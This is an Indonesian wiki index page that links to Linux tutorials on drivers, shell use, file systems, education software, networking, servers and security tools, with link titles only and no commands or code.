* [[Mengatasi Masalah Touchpad di Jaunty 9.04]]&lt;br /&gt;
* [[Printer Driver di Linux]]&lt;br /&gt;
* http://www.ubuntugeek.com/how-to-fix-sound-problem-in-ubuntu-9-10-karmic.html&lt;br /&gt;
* [[Instalasi Java]]&lt;br /&gt;
* [[Instalasi Java di Firefox]]&lt;br /&gt;
* [[Deteksi USB Modem]]&lt;br /&gt;
* http://ubuntuguide.org/wiki/Ubuntu:Maverick#Modems_.2F_Dial-up&lt;br /&gt;
* http://wireless.kernel.org/en/users/Drivers - driver wireless&lt;br /&gt;
* [[Supaya Broadcom bisa bekerja dengan Wireshark]]&lt;br /&gt;
* [[Wireless / WiFi tidak terdeteksi setelah di Install Ubuntu]]&lt;br /&gt;
* [[Alternatif Instalasi Driver Wireless Broadcom]]&lt;br /&gt;
* [[Instalasi NVIDIA – Driver Pada Ubuntu 10.04 (Lucid) LTS + Tips &amp;amp; Trick]]&lt;br /&gt;
* [[VGA Sis 771/671 di Ubuntu 10.04 Lucid Lynx atau BlankOn 6.0 Ombilin]]&lt;br /&gt;
* [[Linux driver untuk STK11 Webcam Video Adapter]]&lt;br /&gt;
* [[Linux driver untuk EasyCap USB2.0 Video Adapter]]&lt;br /&gt;
* [[Linux driver untuk canon pixma ip1880]]&lt;br /&gt;
* http://pakeklinux.wordpress.com/2010/05/09/cara-install-driver-vga-nvidia-di-ubuntu-10-04-lucid-lynx/&lt;br /&gt;
&lt;br /&gt;
== Koleksi Perintah Linux (A-Z) ==&lt;br /&gt;
* [[Indeks Perintah Linux]]&lt;br /&gt;
&lt;br /&gt;
==Aplikasi==&lt;br /&gt;
&lt;br /&gt;
===Linux Dasar===&lt;br /&gt;
* [[Shell]]&lt;br /&gt;
* [[Beberapa Tips Menggunakan Shell di Linux]]&lt;br /&gt;
* [[Tip mempelajari command shell di Linux]]&lt;br /&gt;
* [[Indeks Perintah Linux]]&lt;br /&gt;
* [[Perintah Dasar Linux]]&lt;br /&gt;
* http://cb.vu/unixtoolbox.xhtml - perintah dasar linux&lt;br /&gt;
* [[Cron]]&lt;br /&gt;
* [[Instalasi Printer di Linux]]&lt;br /&gt;
* [[Printer yang di dukung Linux]]&lt;br /&gt;
* [[Instalasi Microsoft TrueType Font di Ubuntu]]&lt;br /&gt;
* [[Anti Virus]]&lt;br /&gt;
* [[Membuat Autoexec.bat di Linux]]&lt;br /&gt;
* [[Shell Script: Untuk FTP]]&lt;br /&gt;
* [http://www.layangan.com/asfik/writings/chroot-login-sshd.html Chroot login di Linux dengan menggunakan sshd]&lt;br /&gt;
* [http://www.layangan.com/asfik/writings/chroot-login-sudo.html Chroot login di Linux dengan menggunakan sudo]&lt;br /&gt;
* [[sudo tanpa password di ubuntu]]&lt;br /&gt;
* http://techno-os.net/info-tutorials/linux/tools-monitoring-wajib-untuk-sysadmin-linux/&lt;br /&gt;
* [[Mencari aplikasi menggunakan aptitude search]]&lt;br /&gt;
* [[Lynx - Browser Web text]]&lt;br /&gt;
* [[diff - Membandingkan Isi File]]&lt;br /&gt;
* [[file - Mengetahui Tipe File]]&lt;br /&gt;
* [[X11 Forwarding di SSH]]&lt;br /&gt;
* [[acpi]] Mengetahui informasi baterai&lt;br /&gt;
* [[Melihat Paket Software Aplikasi yang terinstall di Ubuntu]]&lt;br /&gt;
* [[Linux Command line BitTorrent client]]&lt;br /&gt;
* [[Server: Instalasi GUI di Ubuntu Server]]&lt;br /&gt;
* http://www.tahutek.net/2011/02/ubuntu-trik-backup-semua-aplikasi-yang.html&lt;br /&gt;
* [[diff untuk membandingkan file atau folder]]&lt;br /&gt;
&lt;br /&gt;
===File System===&lt;br /&gt;
* [[Beda ext2 ext3 ext4]]&lt;br /&gt;
* [[Instalasi NTFS]]&lt;br /&gt;
* [[Instalasi RAR]]&lt;br /&gt;
* [[Unrar multiple file]]&lt;br /&gt;
* [[Kompresi File 7z]]&lt;br /&gt;
* [[Mount dan Umount Flashdisk]]&lt;br /&gt;
* [[Format Flashdisk di Shell]]&lt;br /&gt;
* [[Format harddisk]]&lt;br /&gt;
* [[Label harddisk]]&lt;br /&gt;
* [[Mount File iso Membuat Virtual CD]]&lt;br /&gt;
* [[Membuat File iso dari CD atau DVD]]&lt;br /&gt;
* [[Menjalankan program DOS menggunakan DOSEMU]]&lt;br /&gt;
* [[Instalasi Software RAID]]&lt;br /&gt;
* [http://www.doscom.org/2009/05/mounting-otomatis-partisi-ntfs.html Mount Automatis Partisi NTFS]&lt;br /&gt;
* [[remastersys]] - untuk backup Debian &amp;amp; Ubuntu, seperti Ghost.&lt;br /&gt;
* [[iSCSI]]&lt;br /&gt;
* [[Cara Sederhana Untuk Memproteksi USB Harddisk di Ubuntu]]&lt;br /&gt;
* [[Teknik Mengenkripsi Harddisk]]&lt;br /&gt;
* http://www.tahutek.net/2010/08/ubuntu-ofris-aplikasi-mirip-deep-freeze.html#more - DeepFreeze versi Linux&lt;br /&gt;
* http://replayfrom.wordpress.com/2010/08/15/burg-grub-boot-loader/&lt;br /&gt;
* http://ubuntuforums.org/showthread.php?t=1369019 - Password untuk Grub&lt;br /&gt;
* [[Ofris - buat deep freeze di Ubuntu]]&lt;br /&gt;
* [[Cek ceksum download-an]]&lt;br /&gt;
* [[Linux Search Path]]&lt;br /&gt;
&lt;br /&gt;
===Pendidikan===&lt;br /&gt;
* [[Instalasi Edubuntu]]&lt;br /&gt;
* [[Instalasi Aplikasi Belajar Sains / Ilmu Pengetahuan]]&lt;br /&gt;
* [[Belajar sambil bermain dengan Komputer | Linux untuk TK dan SD]]&lt;br /&gt;
* [[Linux untuk Pendidikan]]&lt;br /&gt;
* [[Aplikasi Kamus Inggris Indonesia]]&lt;br /&gt;
* [[Instalasi Edubuntu CD Aplikasi]]&lt;br /&gt;
* [[Software Untuk Pemancar FM Broadcast Komunitas]]&lt;br /&gt;
** [[Instalasi Campcaster]] [[Software]] untuk Control [[Pemancar Broadcast FM Komunitas]]&lt;br /&gt;
* [[Octave open source-nya Mathlab]]&lt;br /&gt;
* [[Scilab open source-nya Mathlab]]&lt;br /&gt;
* [[SAGE open source-nya Mathlab]]&lt;br /&gt;
* [[MAXIMA Symbolic Matematika di Linux]]&lt;br /&gt;
* [[Jaringan Informasi Bersama Antar Sekolah - JIBAS]]&lt;br /&gt;
* [[Calibre - format converter untuk ebook]]&lt;br /&gt;
* [[iTALC - melihat &amp;amp; kontrol komputer murid melalui jaringan]]&lt;br /&gt;
* [[Lab Bahasa]]&lt;br /&gt;
* [[R-CRAN: alternatif pengolah statistik pengganti SPSS]]&lt;br /&gt;
* [[Terjemahkan Aplikasi Pendidikan]]&lt;br /&gt;
&lt;br /&gt;
===[[Multimedia di Linux]]===&lt;br /&gt;
&lt;br /&gt;
===[[Game di Linux]]===&lt;br /&gt;
&lt;br /&gt;
===[[GoogleMap]]===&lt;br /&gt;
===[[Elektronika di Linux]]===&lt;br /&gt;
&lt;br /&gt;
===Tampilan Linux===&lt;br /&gt;
* http://gnome-look.org/&lt;br /&gt;
* [[Linux XP]]&lt;br /&gt;
* [[Nouvelix Linux]]&lt;br /&gt;
* [[Cara Install Theme di Ubuntu]]&lt;br /&gt;
* [[Membuat gambar Splash Image Grub2 Ubuntu 9.10]]&lt;br /&gt;
&lt;br /&gt;
===Office===&lt;br /&gt;
* [http://surabaya.linux.or.id/archives/2007/08/11/opendocument-format-bareng2-pake-format-dokumen-masa-depan.html OpenDocument Format - Format Dokumen Masa Depan]&lt;br /&gt;
* [http://agusw.penamedia.com/2009/09/13/quran-in-openoffice-qioo/ Instalasi Al Qur&#039;an di OpenOffice]&lt;br /&gt;
* [[Office: Konversi PDF ke Office]]&lt;br /&gt;
* [[Aplikasi untuk Penerbitan Buku]]&lt;br /&gt;
* http://tanyarezaervani.wordpress.com/2011/04/03/tanya-45-kamus-bahasa-inggris-offline-di-ubuntu-anda/&lt;br /&gt;
* [[LibreOffice: Update]]&lt;br /&gt;
&lt;br /&gt;
===[[Project Management]]===&lt;br /&gt;
&lt;br /&gt;
* [[Instalasi planner]]&lt;br /&gt;
* [[Instalasi opensched]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Windows di Linux===&lt;br /&gt;
&lt;br /&gt;
* [[wine]]&lt;br /&gt;
* [[Instal wine]]&lt;br /&gt;
* [[Instal playonlinux]] - untuk menjalankan game di [[Linux]] :)&lt;br /&gt;
* http://melengo.wordpress.com/2011/02/27/install-aplikasi-windos-di-linux-mengunakan-crossover-8-0/&lt;br /&gt;
* http://blog.kangdede.web.id/cara-install-font-windows-di-ubuntu/&lt;br /&gt;
&lt;br /&gt;
===Lain-lain===&lt;br /&gt;
* [[ACPI]]&lt;br /&gt;
* [[alsamixer]]&lt;br /&gt;
* [[Computer Aided Design - CAD]]&lt;br /&gt;
* [[OpenOffice Base]] seperti Microsoft Access&lt;br /&gt;
* [[Update Pidgin agar dapat login ke Yahoo.com]]&lt;br /&gt;
&lt;br /&gt;
* [[conky]]&lt;br /&gt;
* [[Instalasi bonnie++]] - untuk benchmarking&lt;br /&gt;
* [[Instalasi Firefox]]&lt;br /&gt;
* [[Instalasi Skype]]&lt;br /&gt;
* [[Instalasi Zekr]] Al Qur&#039;an di [[Linux]]&lt;br /&gt;
* [[Menyambung ke HotSpot]] via text mode&lt;br /&gt;
* [[VirtualBox Virtual Machine di Linux]]&lt;br /&gt;
* [[QEMU generic machine emulator di Linux]]&lt;br /&gt;
* [[Mengambil gmail menggunakan fetchmail]]&lt;br /&gt;
* [[Mengembalikan Icon Network di Ubuntu yang hilang]]&lt;br /&gt;
* [[Instalasi Google Chrome]]&lt;br /&gt;
* [[Membuat Script Sederhana di Linux]]&lt;br /&gt;
* http://pujanggaitusudahmati.wordpress.com/2010/03/10/instalasi-ubuntu-studio-theme-pada-ubuntu-karmic/ - Theme Ubuntu&lt;br /&gt;
* [[Download Manager di Linux]]&lt;br /&gt;
* [[Mirroring Website Dengan httrack]]&lt;br /&gt;
* [[Serial Terminal di Linux]]&lt;br /&gt;
* [[Mengatur Kontras Layar di Linux]]&lt;br /&gt;
* [[Mengatur Kecerahan Layar Di Linux]]&lt;br /&gt;
&lt;br /&gt;
==Download Manager==&lt;br /&gt;
&lt;br /&gt;
* http://404point404.wordpress.com/2011/01/29/prozilla-di-ubuntu-10-10/&lt;br /&gt;
* http://www.tahutek.net/2012/05/prozilla-sudah-bisa-diinstal-di-ubuntu.html&lt;br /&gt;
&lt;br /&gt;
===RSS Feed===&lt;br /&gt;
* [[nrss]] ncurse RSS&lt;br /&gt;
* [[Instalasi gwibber]]&lt;br /&gt;
* [[Instalasi blam]]&lt;br /&gt;
&lt;br /&gt;
===Referensi===&lt;br /&gt;
&lt;br /&gt;
* http://ubuntu-tweak.com/&lt;br /&gt;
&lt;br /&gt;
==Pemrograman==&lt;br /&gt;
&lt;br /&gt;
* [[Belajar C++]]&lt;br /&gt;
* [[Compile Kernel]]&lt;br /&gt;
* [[Compile Kernel Alternatif]]&lt;br /&gt;
* [[Instalasi Ruby]]&lt;br /&gt;
* http://sourceforge.net/projects/baik/ - bahasa pemrograman buatan Indonesia dengan sintaks Indonesia.&lt;br /&gt;
* [[Gambas]] &amp;quot;Visual Basic&amp;quot;-nya [[Linux]]&lt;br /&gt;
* [http://www.jeni.or.id/web/guest/utama Java Education Network Indonesia]&lt;br /&gt;
* [[Pemrograman Java]]&lt;br /&gt;
* http://www.dijexi.com - Situs Tips Pemrogramman&lt;br /&gt;
* [[PIC Programming]]&lt;br /&gt;
* [[Kumpulan Aplikasi Pencari Vulnerabilities di Source Code]]&lt;br /&gt;
&lt;br /&gt;
==Network==&lt;br /&gt;
&lt;br /&gt;
===Overview===&lt;br /&gt;
* [[Networking Fundamental]]&lt;br /&gt;
* [http://www.layangan.com/asfik/writings/dns-bind.html Konsep DNS dan tutorial instalasi BIND] ([http://www.layangan.com/asfik/writings/dns-bind.pdf pdf])&lt;br /&gt;
* [[Konsep Proxy]]&lt;br /&gt;
* [[Konsep IPSec]]&lt;br /&gt;
* [[Teknologi RT/RW-net]]&lt;br /&gt;
* [[ISO untuk Linux / Open Source Box Router]]&lt;br /&gt;
* [[Mail Server]]&lt;br /&gt;
* [[Router Appliance]]&lt;br /&gt;
* [[Mengoptimalkan kemampuan firewall dan proxy server FreeBSD dalam sebuah network sederhana yang hanya memiliki satu IP global]]&lt;br /&gt;
* [http://blog.dapurhosting.com/category/tutorial-cpanel Tutorial cPanel]&lt;br /&gt;
&lt;br /&gt;
===[[Sistem Operasi Router Ready]]===&lt;br /&gt;
&lt;br /&gt;
===Konfigurasi Dasar===&lt;br /&gt;
* [[Konfigurasi Jaringan]]&lt;br /&gt;
* [[Mengkonfigurasi Interface di Ubuntu Shell]]&lt;br /&gt;
* [[Setup IP Address Statik]]&lt;br /&gt;
* [[Instalasi Gnome-PPP]]&lt;br /&gt;
* [[Simulasi Router di Ubuntu dengan Firestarter (run on virtualBox)]]&lt;br /&gt;
* [[Disable IPv6 di Ubuntu]]&lt;br /&gt;
* [[Konfigurasi Wireless Interface ke Access Point Dengan Enkripsi WPA]]&lt;br /&gt;
&lt;br /&gt;
===Proxy===&lt;br /&gt;
* [[Instalasi Squid]] Proxy Server&lt;br /&gt;
* [[Instalasi DansGuardian]] dan [[Firewall Untuk Proxy DansGuardian]]&lt;br /&gt;
* [[Script NAT Proxy]]&lt;br /&gt;
* [[Instalasi Memcache Server]]&lt;br /&gt;
* [[Meredirect Port &amp;amp; Transparant Proxy]]&lt;br /&gt;
* [http://lqman.wordpress.com/2007/11/09/konfigurasi-sederhana-squid-proxy-server/ Konfigurasi Sederhana Squid Proxy Server]&lt;br /&gt;
* [http://lqman.wordpress.com/2008/06/25/squid-transparent-proxy/ Squid Transparent Proxy]&lt;br /&gt;
* [http://lqman.wordpress.com/2008/05/08/pengaturan-beban-squid-menggunakan-beberapa-parent/ Pengaturan Beban Squid Mengunakan Beberapa Parent]&lt;br /&gt;
* [[Instalasi Tinyproxy]]&lt;br /&gt;
* http://wiki.squid-cache.org/Features/Authentication?action=show&amp;amp;redirect=SquidFaq%2FProxyAuthentication - Authentikasi di Squid&lt;br /&gt;
* [[Instalasi Proxy Server di Belakang Modem]]&lt;br /&gt;
&lt;br /&gt;
===Monitoring dan Statistik===&lt;br /&gt;
* [[Monitoring Server]]&lt;br /&gt;
* [[Software untuk Monitoring Jaringan]]&lt;br /&gt;
* [[SiLK Monitor Jaringan Besar]]&lt;br /&gt;
* [[Instalasi AWStats]] Analisa [[Web]] Log Statistik&lt;br /&gt;
* [[Instalasi MRTG]]&lt;br /&gt;
* [[Instalasi NTOP]]&lt;br /&gt;
* [[Instalasi Smokeping]] - Monitoring Latensi / Delay di Network&lt;br /&gt;
* [[Membuat sendiri Aplikasi SpeedTest sejenis dengan www.speedtest.net]]&lt;br /&gt;
* [[Instalasi NAGIOS]] [[Network Management System]]&lt;br /&gt;
* [[Instalasi OSMIUS]] [[Network Management System]]&lt;br /&gt;
* [http://techno-os.net/info-tutorials/linux/tools-monitoring-wajib-untuk-sysadmin-linux/ Tools Monitoring wajib untuk SysAdmin Linux]&lt;br /&gt;
* [[Billing WARNET]]&lt;br /&gt;
* [[20 Linux System Monitoring Tool]]&lt;br /&gt;
&lt;br /&gt;
===DNS===&lt;br /&gt;
* [[Instalasi BIND]] [[DNS Server]]&lt;br /&gt;
* [[Instalasi DynDNS]]&lt;br /&gt;
* [[Tempat Registrasi Domain]]&lt;br /&gt;
* [[Monitoring Traffic DNS]]&lt;br /&gt;
&lt;br /&gt;
===Koneksi Jaringan===&lt;br /&gt;
* [[Penggunaan Vodafone Mobile Connect Card Driver For Linux]]&lt;br /&gt;
* [[Instalasi USB mode switch untuk USB Modem yang ada Storage]]&lt;br /&gt;
* [[Instalasi WvDial]]&lt;br /&gt;
* [[Dial menggunakan WvDial]]&lt;br /&gt;
* [[Dial menggunakan Modem]]&lt;br /&gt;
* [[Load Balancing di Linux]]&lt;br /&gt;
* [[Linux VLAN]] [[Virtual Local Area Network]]&lt;br /&gt;
* http://awarmanf.wordpress.com/2009/12/24/setup-dun-di-ubuntu-treo-680/&lt;br /&gt;
* [[Konfigurasi Broadcom WiFi di Ubuntu]]&lt;br /&gt;
* [[Mempercepat Koneksi Internet di Ubuntu dan Turunannya]]&lt;br /&gt;
* [[Konfigurasi Wireless Interface ke Access Point Dengan Enkripsi WPA]]&lt;br /&gt;
&lt;br /&gt;
===Bandwidth Manajemen===&lt;br /&gt;
* [[Bandwidth Manajemen Menggunakan HTB]]&lt;br /&gt;
* [[Bandwidth Manajemen Menggunakan MasterShaper]]&lt;br /&gt;
* http://awarmanf.wordpress.com/2009/12/29/catchcachehit/&lt;br /&gt;
* http://awarmanf.wordpress.com/2009/12/29/linuxtc1/&lt;br /&gt;
* http://awarmanf.wordpress.com/2009/12/30/linuxtc2/&lt;br /&gt;
* http://awarmanf.wordpress.com/2009/12/30/linuxtc3/&lt;br /&gt;
* http://lartc.org/wondershaper/&lt;br /&gt;
* http://medwinz.blogsome.com/2008/11/18/traffic-shaping-lagi-huh/&lt;br /&gt;
* [[Bandwidth Management: iptables untuk mengatasi IDM]]&lt;br /&gt;
* [[WebHTB]]&lt;br /&gt;
* [[Check Penggunaan Bandwidth]]&lt;br /&gt;
&lt;br /&gt;
===File Server===&lt;br /&gt;
* [[Sharing Printer di Ubuntu]]&lt;br /&gt;
* [[Instalasi dan Konfigurasi NFS]] File Sharing.&lt;br /&gt;
* [[Instalasi dan Konfigurasi SMB]] Windows File Sharing.&lt;br /&gt;
* [http://www.vavai.com/index.php?/archives/46-Samba-Server-sebagai-Primary-Domain-Controller-PDC-Active-Directory-I.html Samba Server sebagai Primary Domain Controller PDC ACtive Directory]&lt;br /&gt;
*[http://vavai.com/v2/2009/06/tutorial-file-server-pengganti-windows-server/ Tutorial File Server Pengganti Windows Server]&lt;br /&gt;
* [[Akses SMB / File Server / Windows File Server menggunakan Ubuntu]]&lt;br /&gt;
* http://howtoforge.com/running-a-file-and-print-server-with-ebox-on-ubuntu8.04-server&lt;br /&gt;
* http://howtoforge.com/running-a-file-and-print-server-with-ebox-on-ubuntu8.04-server-p2&lt;br /&gt;
* http://howtoforge.com/running-a-file-and-print-server-with-ebox-on-ubuntu8.04-server-p3&lt;br /&gt;
&lt;br /&gt;
===Server Jaringan===&lt;br /&gt;
* [[VoIP]] [[Internet Telepon]]&lt;br /&gt;
* [[Instalasi Webmin]] Konfigurasi Server via [[Web]]&lt;br /&gt;
* http://wiki.lxcenter.org/Kloxo+Installation+Guide&lt;br /&gt;
* [[Instalasi DHCP Server]]&lt;br /&gt;
* [[Instalasi FreeRadius]]&lt;br /&gt;
* [[Instalasi FTP Server]]&lt;br /&gt;
* [[Instalasi ProFTP Server]]&lt;br /&gt;
* [[Instalasi SSHD]] [[SSH Server]]&lt;br /&gt;
* [[Instalasi NTP]] [[time server]]&lt;br /&gt;
* [[Instalasi IPCOP]]&lt;br /&gt;
* http://easyhotspot.sourceforge.net - EasyHotSpot Manajemen&lt;br /&gt;
* [[Instalasi Samba]] Windows File Sharing&lt;br /&gt;
* [[Linux Terminal Server Project]]&lt;br /&gt;
&lt;br /&gt;
===[[Linux Terminal Server Project]] ([[LTSP]])===&lt;br /&gt;
&lt;br /&gt;
* [[DRBL (Diskless Remote Boot in Linux)]]&lt;br /&gt;
* [[Clonezilla]]&lt;br /&gt;
&lt;br /&gt;
===Web Server===&lt;br /&gt;
* [[Instalasi Apache]] [[Web Server]]&lt;br /&gt;
* [[Instalasi Lighttpd]] [[Web Server]]&lt;br /&gt;
* [[Instalasi XAMPP]] [[Web Server]]&lt;br /&gt;
* [[Mengaktifkan https di Apache]]&lt;br /&gt;
* [[Apache2: Mengaktifkan Modul Apache]]&lt;br /&gt;
* [[Apache2: Mengaktifkan public_html untuk user]]&lt;br /&gt;
* [[Konfigurasi Sederhana Virtual Host di Apache]]&lt;br /&gt;
* [[PHP PEAR]]&lt;br /&gt;
* [[Web Server Object Caching]]&lt;br /&gt;
* [[nginx]]&lt;br /&gt;
* [[Awstats]]&lt;br /&gt;
* [[Calamaris]]&lt;br /&gt;
&lt;br /&gt;
===Mail Server===&lt;br /&gt;
* [[Instalasi Postfix]] [[SMTP Mail Server]]&lt;br /&gt;
* [https://help.ubuntu.com/community/PostfixCompleteVirtualMailSystemHowto Postfix Complete Virtual Mail System Howto]&lt;br /&gt;
* [[Instalasi POP3 Server]]&lt;br /&gt;
* [[Instalasi IMAP Server]]&lt;br /&gt;
* [[Instalasi Dovecot]] POP3/IMAP Server&lt;br /&gt;
* [[instalasi Squirrelmail]] Webmail Server&lt;br /&gt;
* [[Instalasi Mailman]] mailing list server&lt;br /&gt;
* [[Instalasi Mailman di Ubuntu]]&lt;br /&gt;
* [http://www.layangan.com/asfik/writings/qmail-vmailmgr.html Instalasi Qmail, Vmailmgr, Omail Admin, Courier Imap, dan Squirrelmail]&lt;br /&gt;
* [[Procmail]]&lt;br /&gt;
* [[Zimbra]]&lt;br /&gt;
&lt;br /&gt;
===Database Server===&lt;br /&gt;
* [[Instalasi MySQL]] [[database server]]&lt;br /&gt;
* [[Instalasi Oracle]] [[database server]]&lt;br /&gt;
* [[Instalasi Berkeley DB]]&lt;br /&gt;
* [[Instalasi PostgresQL]] [[database server]]&lt;br /&gt;
* [[Instalasi FreeRADIUS]]&lt;br /&gt;
* [[Menggunakan UnixODBC]]&lt;br /&gt;
* [[Perintah MySQL]]&lt;br /&gt;
* http://www.linuxquestions.org/questions/linux-server-73/how-to-enable-mssql-on-linux-589956/&lt;br /&gt;
&lt;br /&gt;
===Chatting Server===&lt;br /&gt;
* [[Instalasi eJabberd]] [[Instant Messaging]] / [[Internet Messaging]]&lt;br /&gt;
* [[Instalasi Jabber]] [[Instant Messaging]] / [[Internet Messaging]]&lt;br /&gt;
* [[Instalasi Jabberd2]] [[Instant Messaging]] / [[Internet Messaging]]&lt;br /&gt;
&lt;br /&gt;
===Forum Server===&lt;br /&gt;
* [[Instalasi PunBB]] Forum&lt;br /&gt;
* [[Instalasi Vanilla Forum]]&lt;br /&gt;
* [[MyBB]]&lt;br /&gt;
&lt;br /&gt;
===Server Perpustakaan &amp;amp; Knowledge Management===&lt;br /&gt;
* [[Instalasi Senayan]] Digital Library&lt;br /&gt;
* [[Instalasi KnowledgeTree]] Digital Library&lt;br /&gt;
* [[Instalasi KnowledgeTree Versi 3.7]]&lt;br /&gt;
* [[Epiware]]&lt;br /&gt;
* [[Greenstone]]&lt;br /&gt;
* [[OpenKM]]&lt;br /&gt;
* [[Owl]]&lt;br /&gt;
&lt;br /&gt;
===Server Sistem Informasi Sekolah &amp;amp; Kampus===&lt;br /&gt;
* [[cmsbalitbang]] Web Sekolah dari BALITBANG DIKNAS&lt;br /&gt;
* [[Instalasi Sisfokampus]]&lt;br /&gt;
* [[Instalasi Sisfokol SD]]&lt;br /&gt;
* [[Instalasi Sisfokol SMP]]&lt;br /&gt;
* [[Instalasi Sisfokol SMA]]&lt;br /&gt;
* [[Instalasi Sisfokol SMK]]&lt;br /&gt;
* [[Instalasi Sisfokol Janisari]]&lt;br /&gt;
* [[SISFOKOL SLTA]]&lt;br /&gt;
* [[Konfigurasi php.ini agar SISFOKOL berjalan sempurna]]&lt;br /&gt;
* [[Instalasi MediaWiki]] Wiki Server (seperti [http://opensource.telkomspeedy.com/wiki SpeedyWiki])&lt;br /&gt;
* [[Cara Instalasi SUPERPEDIA | Instalasi Superpedia]]&lt;br /&gt;
* [[Instalasi Data Wikipedia dari Kambing]]&lt;br /&gt;
* [[Instalasi Moodle]] e-learning Server&lt;br /&gt;
&lt;br /&gt;
===Social Networking===&lt;br /&gt;
&lt;br /&gt;
* [[Instalasi Mahara]] Social Networking&lt;br /&gt;
* [[Instalasi OpenPNE]] Social Networking&lt;br /&gt;
* [[jcow]]&lt;br /&gt;
* [[oxwall]]&lt;br /&gt;
* [[elgg]]&lt;br /&gt;
&lt;br /&gt;
===Server Aplikasi===&lt;br /&gt;
&lt;br /&gt;
* [[Apache Lucene Solr: open source enterprise search platform]]&lt;br /&gt;
* [[Content Manajemen System CMS untuk Dunia Pendidikan]]&lt;br /&gt;
* [[e-Auction Server]]&lt;br /&gt;
* [http://webtecker.com/2008/04/22/8-best-open-source-shopping-cart-solutions/ Best Open Source Shopping Cart Solutions]&lt;br /&gt;
* [[SMS Server]]&lt;br /&gt;
* [[Source Forge Collaboration Server]]&lt;br /&gt;
* [[CARE2X Sistem Informasi Rumah Sakit]]&lt;br /&gt;
* [[Instalasi Asterisk]] VoIP Softswitch&lt;br /&gt;
* [[Instalasi eGroupWare]]&lt;br /&gt;
* [[Instalasi Elgg]] Social Networking&lt;br /&gt;
* [[Jcow]] Social Networking&lt;br /&gt;
* [[Instalasi Hadist Web]]&lt;br /&gt;
* [[Instalasi Joomla]] [[CMS]]&lt;br /&gt;
** [http://surabaya.linux.or.id/archives/2008/03/11/merecovery-password-administrator-joomla.html Merecovery Password Administrator Joomla]&lt;br /&gt;
** [[Instalasi VirtueMart di Joomla]]&lt;br /&gt;
* [[Instalasi PHPMotion]] Youtube Clone&lt;br /&gt;
* [[Instalasi PrestaShop]] e-commerce server&lt;br /&gt;
* [[Instalasi SQL Ledger]] Server untuk [[Accounting]]&lt;br /&gt;
* [[Instalasi Ushahidi]]&lt;br /&gt;
* [[Instalasi WebERP]]&lt;br /&gt;
* [[Instalasi Wordpress]] Blog Server&lt;br /&gt;
* [[Instalasi Wordpress Multi User]] Blog Server&lt;br /&gt;
* [[Instalasi WaypointHR]] Server [[HRD]]&lt;br /&gt;
* [[Membuat Game Server di linux]]&lt;br /&gt;
* [[Software Gratis untuk mendirikan Toko On-Line melalui internet berbasis AJAX Web 2.0]]&lt;br /&gt;
* [[Membuat Server Video Streaming Berbasis Web]]&lt;br /&gt;
* [http://tunggul.staff.uns.ac.id/2008/09/03/bikin-rapidshare-dengan-droopy/ Bikin RapidShare dengan Droopy]&lt;br /&gt;
* [[Instalasi Sahana]]&lt;br /&gt;
* [[Moodle]]&lt;br /&gt;
* http://www.howtoforge.com/build-your-own-video-community-with-lighttpd-and-flowplayer-ubuntu-9.10 - Streaming Video&lt;br /&gt;
* http://www.cyberciti.biz/tips/open-source-project-management-software.html - [[web]] based project management&lt;br /&gt;
* [[xTuple]]&lt;br /&gt;
&lt;br /&gt;
===[[Cloud Computing]]===&lt;br /&gt;
&lt;br /&gt;
* [[Eucalyptus]]&lt;br /&gt;
* [[Amazon Web Services]]&lt;br /&gt;
* [[Elastic Fox]]&lt;br /&gt;
* [[Euca2ools]]&lt;br /&gt;
&lt;br /&gt;
==[[Security &amp;amp; Network Security]]==&lt;br /&gt;
&lt;br /&gt;
* [[Beberapa Tip Hacking]]&lt;br /&gt;
* [[Meneropong Situs e-banking]]&lt;br /&gt;
* http://awarmanf.wordpress.com/2009/12/23/membuat-linux-kebal-arp-poisoning-arp-spoofing/&lt;br /&gt;
* http://www.go2linux.org/fedora-centos-root-password-recovery - kalau lupa [[password]] root&lt;br /&gt;
* [[Instalasi PacketTracer Cisco di Ubuntu]]&lt;br /&gt;
* [[Melihat Header e-mail]]&lt;br /&gt;
* [[Menggunakan whois]]&lt;br /&gt;
* http://hendrasiahaan.wordpress.com/2010/03/24/11-kelemahan-yang-kerap-tidak-disadari-admin-jaringan/&lt;br /&gt;
* [[Enkripsi Disk]]&lt;br /&gt;
* http://www.madboa.com/geek/gpg-quickstart/#keyintro - GPG Key&lt;br /&gt;
* [[tuxcut]]&lt;br /&gt;
* http://www.howtoforge.com/video_surveillance_zoneminder_ubuntu -Video Surveillace di Ubuntu&lt;br /&gt;
* [[Linux Malware Detect]]&lt;br /&gt;
&lt;br /&gt;
===Firewall &amp;amp; Blokir Situs===&lt;br /&gt;
* [[Mini Howto iptables untuk Firewall]]&lt;br /&gt;
* [[Block Website Dengan Firestarter]]&lt;br /&gt;
* [http://aceh.linux.or.id/archives/393 Firestarter [[Firewall]] untuk [[Ubuntu]]]&lt;br /&gt;
* [[Teknik Memblok Situs Tidak Baik]]&lt;br /&gt;
* [[Firewall Untuk Proxy DansGuardian]]&lt;br /&gt;
* [[Edit Konfigurasi Pemblokiran Dansguardian]]&lt;br /&gt;
* [[Instalasi phpSHIELD]]&lt;br /&gt;
* http://awarmanf.wordpress.com/2009/12/23/membuat-linux-kebal-arp-poisoning-arp-spoofing/&lt;br /&gt;
* http://techno-os.net/info-tutorials/hacking/pemutus-jaringan-lan-di-linux-dengan-technocut/&lt;br /&gt;
* http://awarmanf.wordpress.com/2010/05/01/drop-ultrasurf-dengan-iptables/&lt;br /&gt;
&lt;br /&gt;
===Network Monitoring &amp;amp; Intrution Detection===&lt;br /&gt;
* [[Instalasi Nessus]]&lt;br /&gt;
* [[Instalasi NTOP]]&lt;br /&gt;
* [[Instalasi SNORT dan BASE]] [[Intrusion Detection System]] ([[IDS]])&lt;br /&gt;
* [[Instalasi EasyIDS]]&lt;br /&gt;
* [[Suricata Open Source Next Generation Intrusion Detection and Prevention Engine]]&lt;br /&gt;
* http://www.endace.com/cyber-security-monitoring.html&lt;br /&gt;
* [[Instalasi MailScanner]]&lt;br /&gt;
* http://www.scamnailer.info/&lt;br /&gt;
* [[Teknik Anti Spam]]&lt;br /&gt;
&lt;br /&gt;
===Secure Connection===&lt;br /&gt;
* [[Virtual Private Network]] ([[VPN]])&lt;br /&gt;
* [[Instalasi dan Konfigurasi rsync]] untuk backup antar mesin&lt;br /&gt;
* [[Persiapan SSH untuk SCP Batch]]&lt;br /&gt;
* [[Topal - Pengikat GnuPG dan Alpine]]&lt;br /&gt;
* [[Mengikat GnuPG dan Alpine]]&lt;br /&gt;
